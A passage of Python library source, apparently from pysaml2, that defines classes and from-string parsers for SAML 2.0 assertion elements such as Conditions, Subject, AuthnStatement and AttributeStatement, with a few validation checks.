urn:oasis:names:tc:SAML:2.0:assertion:AssertionURIRef element """ c_tag = 'AssertionURIRef' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def assertion_uri_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AssertionURIRef, xml_string) class SubjectConfirmationDataType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationDataType element """ c_tag = 'SubjectConfirmationDataType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['NotBefore'] = ('not_before', 'dateTime', False) c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False) c_attributes['Recipient'] = ('recipient', 'anyURI', False) c_attributes['InResponseTo'] = ('in_response_to', 'NCName', False) c_attributes['Address'] = ('address', 'string', False) c_any = {"namespace": "##any", "processContents": "lax", "minOccurs": "0", "maxOccurs": "unbounded"} c_any_attribute = {"namespace": "##other", "processContents": "lax"} def __init__(self, not_before=None, not_on_or_after=None, recipient=None, in_response_to=None, address=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.not_before = not_before self.not_on_or_after = not_on_or_after self.recipient = recipient self.in_response_to = in_response_to self.address = address def subject_confirmation_data_type__from_string(xml_string): return saml2.create_class_from_xml_string(SubjectConfirmationDataType_, xml_string) class KeyInfoConfirmationDataType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:KeyInfoConfirmationDataType element """ c_tag = 'KeyInfoConfirmationDataType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info', [ds.KeyInfo]) c_cardinality['key_info'] = {"min": 1} c_child_order.extend(['key_info']) def __init__(self, key_info=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.key_info = key_info or [] def key_info_confirmation_data_type__from_string(xml_string): return saml2.create_class_from_xml_string(KeyInfoConfirmationDataType_, xml_string) class ConditionAbstractType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:ConditionAbstractType element """ c_tag = 'ConditionAbstractType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() class Audience(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:Audience element """ c_tag = 'Audience' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def audience_from_string(xml_string): return saml2.create_class_from_xml_string(Audience, xml_string) class OneTimeUseType_(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUseType element """ c_tag = 'OneTimeUseType' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() def one_time_use_type__from_string(xml_string): return saml2.create_class_from_xml_string(OneTimeUseType_, xml_string) class ProxyRestrictionType_(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestrictionType element """ c_tag = 'ProxyRestrictionType' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = ('audience', [Audience]) c_cardinality['audience'] = {"min": 0} c_attributes['Count'] = ('count', 'nonNegativeInteger', False) c_child_order.extend(['audience']) def __init__(self, audience=None, count=None, text=None, extension_elements=None, extension_attributes=None): ConditionAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.audience = audience or [] self.count = count def proxy_restriction_type__from_string(xml_string): return saml2.create_class_from_xml_string(ProxyRestrictionType_, xml_string) class EncryptedAssertion(EncryptedElementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAssertion element """ c_tag = 'EncryptedAssertion' c_namespace = NAMESPACE c_children = EncryptedElementType_.c_children.copy() c_attributes = EncryptedElementType_.c_attributes.copy() c_child_order = EncryptedElementType_.c_child_order[:] c_cardinality = EncryptedElementType_.c_cardinality.copy() def encrypted_assertion_from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedAssertion, xml_string) class StatementAbstractType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:StatementAbstractType element """ c_tag = 'StatementAbstractType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() class SubjectLocalityType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocalityType element """ c_tag = 'SubjectLocalityType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['Address'] = ('address', 'string', False) c_attributes['DNSName'] = ('dns_name', 'string', False) def __init__(self, address=None, dns_name=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.address = address self.dns_name = dns_name def subject_locality_type__from_string(xml_string): return saml2.create_class_from_xml_string(SubjectLocalityType_, xml_string) class AuthnContextClassRef(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef element """ c_tag = 'AuthnContextClassRef' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authn_context_class_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextClassRef, xml_string) class AuthnContextDeclRef(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDeclRef element """ c_tag = 'AuthnContextDeclRef' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authn_context_decl_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextDeclRef, xml_string) class AuthnContextDecl(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDecl element """ c_tag = 'AuthnContextDecl' c_namespace = NAMESPACE c_value_type = {'base': 'anyType'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authn_context_decl_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextDecl, xml_string) class AuthenticatingAuthority(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthenticatingAuthority element """ c_tag = 'AuthenticatingAuthority' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authenticating_authority_from_string(xml_string): return saml2.create_class_from_xml_string(AuthenticatingAuthority, xml_string) class DecisionType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:DecisionType element """ c_tag = 'DecisionType' c_namespace = NAMESPACE c_value_type = {'base': 'string', 'enumeration': ['Permit', 'Deny', 'Indeterminate']} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def decision_type__from_string(xml_string): return saml2.create_class_from_xml_string(DecisionType_, xml_string) class ActionType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:ActionType element """ c_tag = 'ActionType' c_namespace = NAMESPACE c_value_type = {'base': 'string'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['Namespace'] = ('namespace', 'anyURI', True) def __init__(self, namespace=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.namespace = namespace def action_type__from_string(xml_string): return saml2.create_class_from_xml_string(ActionType_, xml_string) class AttributeValue(AttributeValueBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeValue element """ c_tag = 'AttributeValue' c_namespace = NAMESPACE c_value_type = {'base': 'anyType'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def attribute_value_from_string(xml_string): return saml2.create_class_from_xml_string(AttributeValue, xml_string) class EncryptedAttribute(EncryptedElementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAttribute element """ c_tag = 'EncryptedAttribute' c_namespace = NAMESPACE c_children = EncryptedElementType_.c_children.copy() c_attributes = EncryptedElementType_.c_attributes.copy() c_child_order = EncryptedElementType_.c_child_order[:] c_cardinality = EncryptedElementType_.c_cardinality.copy() def encrypted_attribute_from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedAttribute, xml_string) class BaseID(BaseIDAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:BaseID element """ c_tag = 'BaseID' c_namespace = NAMESPACE c_children = BaseIDAbstractType_.c_children.copy() c_attributes = BaseIDAbstractType_.c_attributes.copy() c_child_order = BaseIDAbstractType_.c_child_order[:] c_cardinality = BaseIDAbstractType_.c_cardinality.copy() def base_id_from_string(xml_string): return saml2.create_class_from_xml_string(BaseID, xml_string) class NameID(NameIDType_): """The urn:oasis:names:tc:SAML:2.0:assertion:NameID element From the Oasis SAML2 Technical Overview: "The <NameID> element within a <Subject> offers the ability to provide name identifiers in a number of different formats. SAML's predefined formats include: Email address, X.509 subject name, Windows domain qualified name, Kerberos principal name, Entity identifier, Persistent identifier, Transient identifier." """ c_tag = 'NameID' c_namespace = NAMESPACE c_children = NameIDType_.c_children.copy() c_attributes = NameIDType_.c_attributes.copy() c_child_order = NameIDType_.c_child_order[:] c_cardinality = NameIDType_.c_cardinality.copy() def name_id_from_string(xml_string): return saml2.create_class_from_xml_string(NameID, xml_string) class SubjectConfirmationData(SubjectConfirmationDataType_): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationData element """ c_tag = 'SubjectConfirmationData' c_namespace = NAMESPACE c_children = SubjectConfirmationDataType_.c_children.copy() c_attributes = SubjectConfirmationDataType_.c_attributes.copy() c_child_order = SubjectConfirmationDataType_.c_child_order[:] c_cardinality = SubjectConfirmationDataType_.c_cardinality.copy() def subject_confirmation_data_from_string(xml_string): return saml2.create_class_from_xml_string(SubjectConfirmationData, xml_string) class Condition(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Condition element """ c_tag = 'Condition' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() def condition_from_string(xml_string): return saml2.create_class_from_xml_string(Condition, xml_string) class AudienceRestrictionType_(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestrictionType element """ c_tag = 'AudienceRestrictionType' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = ('audience', [Audience]) c_cardinality['audience'] = {"min": 1} c_child_order.extend(['audience']) def __init__(self, audience=None, text=None, extension_elements=None, extension_attributes=None): ConditionAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.audience = audience or [] def audience_restriction_type__from_string(xml_string): return saml2.create_class_from_xml_string(AudienceRestrictionType_, xml_string) class OneTimeUse(OneTimeUseType_): """The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUse element """ c_tag = 'OneTimeUse' c_namespace = NAMESPACE c_children = OneTimeUseType_.c_children.copy() c_attributes = OneTimeUseType_.c_attributes.copy() c_child_order = OneTimeUseType_.c_child_order[:] c_cardinality = OneTimeUseType_.c_cardinality.copy() def one_time_use_from_string(xml_string): return saml2.create_class_from_xml_string(OneTimeUse, xml_string) class ProxyRestriction(ProxyRestrictionType_): """The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestriction element """ c_tag = 'ProxyRestriction' c_namespace = NAMESPACE c_children = ProxyRestrictionType_.c_children.copy() c_attributes = ProxyRestrictionType_.c_attributes.copy() c_child_order = ProxyRestrictionType_.c_child_order[:] c_cardinality = ProxyRestrictionType_.c_cardinality.copy() def proxy_restriction_from_string(xml_string): return saml2.create_class_from_xml_string(ProxyRestriction, xml_string) class Statement(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Statement element """ c_tag = 'Statement' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() def statement_from_string(xml_string): return saml2.create_class_from_xml_string(Statement, xml_string) class SubjectLocality(SubjectLocalityType_): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocality element """ c_tag = 'SubjectLocality' c_namespace = NAMESPACE c_children = SubjectLocalityType_.c_children.copy() c_attributes = SubjectLocalityType_.c_attributes.copy() c_child_order = SubjectLocalityType_.c_child_order[:] c_cardinality = SubjectLocalityType_.c_cardinality.copy() def verify(self): if self.address: # dotted-decimal IPv4 or RFC3513 IPv6 address if valid_ipv4(self.address) or valid_ipv6(self.address): pass else: raise ShouldValueError("Not an IPv4 or IPv6 address") elif self.dns_name: valid_domain_name(self.dns_name) return SubjectLocalityType_.verify(self) def subject_locality_from_string(xml_string): return saml2.create_class_from_xml_string(SubjectLocality, xml_string) class AuthnContextType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextType element """ c_tag = 'AuthnContextType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children[ '{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextClassRef'] = ( 'authn_context_class_ref', AuthnContextClassRef) c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDecl'] = ( 'authn_context_decl', AuthnContextDecl) c_cardinality['authn_context_decl'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDeclRef'] = ( 'authn_context_decl_ref', AuthnContextDeclRef) c_cardinality['authn_context_decl_ref'] = {"min": 0, "max": 1} c_children[ '{urn:oasis:names:tc:SAML:2.0:assertion}AuthenticatingAuthority'] = ( 'authenticating_authority', [AuthenticatingAuthority]) c_cardinality['authenticating_authority'] = {"min": 0} c_child_order.extend(['authn_context_class_ref', 'authn_context_decl', 'authn_context_decl_ref', 'authenticating_authority']) def __init__(self, authn_context_class_ref=None, authn_context_decl=None, authn_context_decl_ref=None, authenticating_authority=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.authn_context_class_ref = authn_context_class_ref self.authn_context_decl = authn_context_decl self.authn_context_decl_ref = authn_context_decl_ref self.authenticating_authority = authenticating_authority or [] def verify(self): if self.authn_context_decl and self.authn_context_decl_ref: raise Exception( "Invalid Response: " "Cannot have both <AuthnContextDecl> and <AuthnContextDeclRef>" ) return SamlBase.verify(self) def authn_context_type__from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextType_, xml_string) class Action(ActionType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Action element """ c_tag = 'Action' c_namespace = NAMESPACE c_children = ActionType_.c_children.copy() c_attributes = ActionType_.c_attributes.copy() c_child_order = ActionType_.c_child_order[:] c_cardinality = ActionType_.c_cardinality.copy() def action_from_string(xml_string): return saml2.create_class_from_xml_string(Action, xml_string) class AttributeType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeType element """ c_tag = 'AttributeType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue'] = ( 'attribute_value', [AttributeValue]) c_cardinality['attribute_value'] = {"min": 0} c_attributes['Name'] = ('name', 'string', True) c_attributes['NameFormat'] = ('name_format', 'anyURI', False) c_attributes['FriendlyName'] = ('friendly_name', 'string', False) c_child_order.extend(['attribute_value']) c_any_attribute = {"namespace": "##other", "processContents": "lax"} def __init__(self, attribute_value=None, name=None, name_format=NAME_FORMAT_URI, friendly_name=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.attribute_value = attribute_value or [] self.name = name self.name_format = name_format self.friendly_name = friendly_name # when consuming such elements, default to NAME_FORMAT_UNSPECIFIED as NameFormat def harvest_element_tree(self, tree): tree.attrib.setdefault('NameFormat', NAME_FORMAT_UNSPECIFIED) SamlBase.harvest_element_tree(self, tree) def attribute_type__from_string(xml_string): return saml2.create_class_from_xml_string(AttributeType_, xml_string) class SubjectConfirmationType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationType element """ c_tag = 'SubjectConfirmationType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id', BaseID) c_cardinality['base_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id', NameID) c_cardinality['name_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = ( 'encrypted_id', EncryptedID) c_cardinality['encrypted_id'] = {"min": 0, "max": 1} c_children[ '{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmationData'] = ( 'subject_confirmation_data', SubjectConfirmationData) c_cardinality['subject_confirmation_data'] = {"min": 0, "max": 1} c_attributes['Method'] = ('method', 'anyURI', True) c_child_order.extend(['base_id', 'name_id', 'encrypted_id', 'subject_confirmation_data']) def __init__(self, base_id=None, name_id=None, encrypted_id=None, subject_confirmation_data=None, method=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.base_id = base_id self.name_id = name_id self.encrypted_id = encrypted_id self.subject_confirmation_data = subject_confirmation_data self.method = method def subject_confirmation_type__from_string(xml_string): return saml2.create_class_from_xml_string(SubjectConfirmationType_, xml_string) class AudienceRestriction(AudienceRestrictionType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestriction element """ c_tag = 'AudienceRestriction' c_namespace = NAMESPACE c_children = AudienceRestrictionType_.c_children.copy() c_attributes = AudienceRestrictionType_.c_attributes.copy() c_child_order = AudienceRestrictionType_.c_child_order[:] c_cardinality = AudienceRestrictionType_.c_cardinality.copy() def audience_restriction_from_string(xml_string): return saml2.create_class_from_xml_string(AudienceRestriction, xml_string) class AuthnContext(AuthnContextType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContext element """ c_tag = 'AuthnContext' c_namespace = NAMESPACE c_children = AuthnContextType_.c_children.copy() c_attributes = AuthnContextType_.c_attributes.copy() c_child_order = AuthnContextType_.c_child_order[:] c_cardinality = AuthnContextType_.c_cardinality.copy() def authn_context_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContext, xml_string) class Attribute(AttributeType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Attribute element """ c_tag = 'Attribute' c_namespace = NAMESPACE c_children = AttributeType_.c_children.copy() c_attributes = AttributeType_.c_attributes.copy() c_child_order = AttributeType_.c_child_order[:] c_cardinality = AttributeType_.c_cardinality.copy() def attribute_from_string(xml_string): return saml2.create_class_from_xml_string(Attribute, xml_string) class SubjectConfirmation(SubjectConfirmationType_): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmation element """ c_tag = 'SubjectConfirmation' c_namespace = NAMESPACE c_children = SubjectConfirmationType_.c_children.copy() c_attributes = SubjectConfirmationType_.c_attributes.copy() c_child_order = SubjectConfirmationType_.c_child_order[:] c_cardinality = SubjectConfirmationType_.c_cardinality.copy() def subject_confirmation_from_string(xml_string): return saml2.create_class_from_xml_string(SubjectConfirmation, xml_string) class ConditionsType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:ConditionsType element """ c_tag = 'ConditionsType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Condition'] = ( 'condition', [Condition]) c_cardinality['condition'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AudienceRestriction'] = ( 'audience_restriction', [AudienceRestriction]) c_cardinality['audience_restriction'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}OneTimeUse'] = ( 'one_time_use', [OneTimeUse]) c_cardinality['one_time_use'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}ProxyRestriction'] = ( 'proxy_restriction', [ProxyRestriction]) c_cardinality['proxy_restriction'] = {"min": 0} c_attributes['NotBefore'] = ('not_before', 'dateTime', False) c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False) c_child_order.extend(['condition', 'audience_restriction', 'one_time_use', 'proxy_restriction']) def __init__(self, condition=None, audience_restriction=None, one_time_use=None, proxy_restriction=None, not_before=None, not_on_or_after=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.condition = condition or [] self.audience_restriction = audience_restriction or [] self.one_time_use = one_time_use or [] self.proxy_restriction = proxy_restriction or [] self.not_before = not_before self.not_on_or_after = not_on_or_after def verify(self): if self.one_time_use: if len(self.one_time_use) != 1: raise Exception("Cannot be used more than once") if self.proxy_restriction: if len(self.proxy_restriction) != 1: raise Exception("Cannot be used more than once") return SamlBase.verify(self) def conditions_type__from_string(xml_string): return saml2.create_class_from_xml_string(ConditionsType_, xml_string) class AuthnStatementType_(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatementType element """ c_tag = 'AuthnStatementType' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectLocality'] = ( 'subject_locality', SubjectLocality) c_cardinality['subject_locality'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContext'] = ( 'authn_context', AuthnContext) c_attributes['AuthnInstant'] = ('authn_instant', 'dateTime', True) c_attributes['SessionIndex'] = ('session_index', 'string', False) c_attributes['SessionNotOnOrAfter'] = ('session_not_on_or_after', 'dateTime', False) c_child_order.extend(['subject_locality', 'authn_context']) def __init__(self, subject_locality=None, authn_context=None, authn_instant=None, session_index=None, session_not_on_or_after=None, text=None, extension_elements=None, extension_attributes=None): StatementAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.subject_locality = subject_locality self.authn_context = authn_context self.authn_instant = authn_instant self.session_index = session_index self.session_not_on_or_after = session_not_on_or_after def authn_statement_type__from_string(xml_string): return saml2.create_class_from_xml_string(AuthnStatementType_, xml_string) class AttributeStatementType_(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatementType element """ c_tag = 'AttributeStatementType' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Attribute'] = ( 'attribute', [Attribute]) c_cardinality['attribute'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAttribute'] = ( 'encrypted_attribute', [EncryptedAttribute]) c_cardinality['encrypted_attribute'] = {"min": 0} c_child_order.extend(['attribute', 'encrypted_attribute']) def __init__(self, attribute=None, encrypted_attribute=None, text=None, extension_elements=None, extension_attributes=None): StatementAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.attribute = attribute or [] self.encrypted_attribute = encrypted_attribute or [] def attribute_statement_type__from_string(xml_string): return saml2.create_class_from_xml_string(AttributeStatementType_, xml_string) class SubjectType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectType element """ c_tag = 'SubjectType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id', BaseID) c_cardinality['base_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id', NameID) c_cardinality['name_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = ( 'encrypted_id', EncryptedID) c_cardinality['encrypted_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmation'] = ( 'subject_confirmation', [SubjectConfirmation]) c_cardinality['subject_confirmation'] = {"min": 0} c_child_order.extend(['base_id', 'name_id', 'encrypted_id', 'subject_confirmation']) def __init__(self, base_id=None, name_id=None, encrypted_id=None, subject_confirmation=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.base_id = base_id self.name_id = name_id self.encrypted_id = encrypted_id self.subject_confirmation = subject_confirmation or [] def subject_type__from_string(xml_string): return saml2.create_class_from_xml_string(SubjectType_, xml_string) class Conditions(ConditionsType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Conditions element """ c_tag = 'Conditions' c_namespace = NAMESPACE c_children = ConditionsType_.c_children.copy() c_attributes = ConditionsType_.c_attributes.copy() c_child_order = ConditionsType_.c_child_order[:] c_cardinality = ConditionsType_.c_cardinality.copy() def conditions_from_string(xml_string): return saml2.create_class_from_xml_string(Conditions, xml_string) class AuthnStatement(AuthnStatementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatement element """ c_tag = 'AuthnStatement' c_namespace = NAMESPACE c_children = AuthnStatementType_.c_children.copy() c_attributes = AuthnStatementType_.c_attributes.copy() c_child_order = AuthnStatementType_.c_child_order[:] c_cardinality = AuthnStatementType_.c_cardinality.copy() def authn_statement_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnStatement, xml_string) class AttributeStatement(AttributeStatementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatement element """ c_tag = 'AttributeStatement' c_namespace = NAMESPACE c_children = AttributeStatementType_.c_children.copy() c_attributes = AttributeStatementType_.c_attributes.copy() c_child_order = AttributeStatementType_.c_child_order[:] c_cardinality = AttributeStatementType_.c_cardinality.copy() def attribute_statement_from_string(xml_string): return saml2.create_class_from_xml_string(AttributeStatement, xml_string) class Subject(SubjectType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Subject element """ c_tag = 'Subject' c_namespace = NAMESPACE c_children = SubjectType_.c_children.copy() c_attributes = SubjectType_.c_attributes.copy() c_child_order = SubjectType_.c_child_order[:] c_cardinality = SubjectType_.c_cardinality.copy() def subject_from_string(xml_string): return saml2.create_class_from_xml_string(Subject, xml_string) #.................. # ['AuthzDecisionStatement', 'EvidenceType', 'AdviceType', 'Evidence', # 'Assertion', 'AssertionType', 'AuthzDecisionStatementType', 'Advice'] class EvidenceType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:EvidenceType element """ c_tag = 'EvidenceType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = ( 'assertion_id_ref', [AssertionIDRef]) c_cardinality['assertion_id_ref'] = {"min": 0} 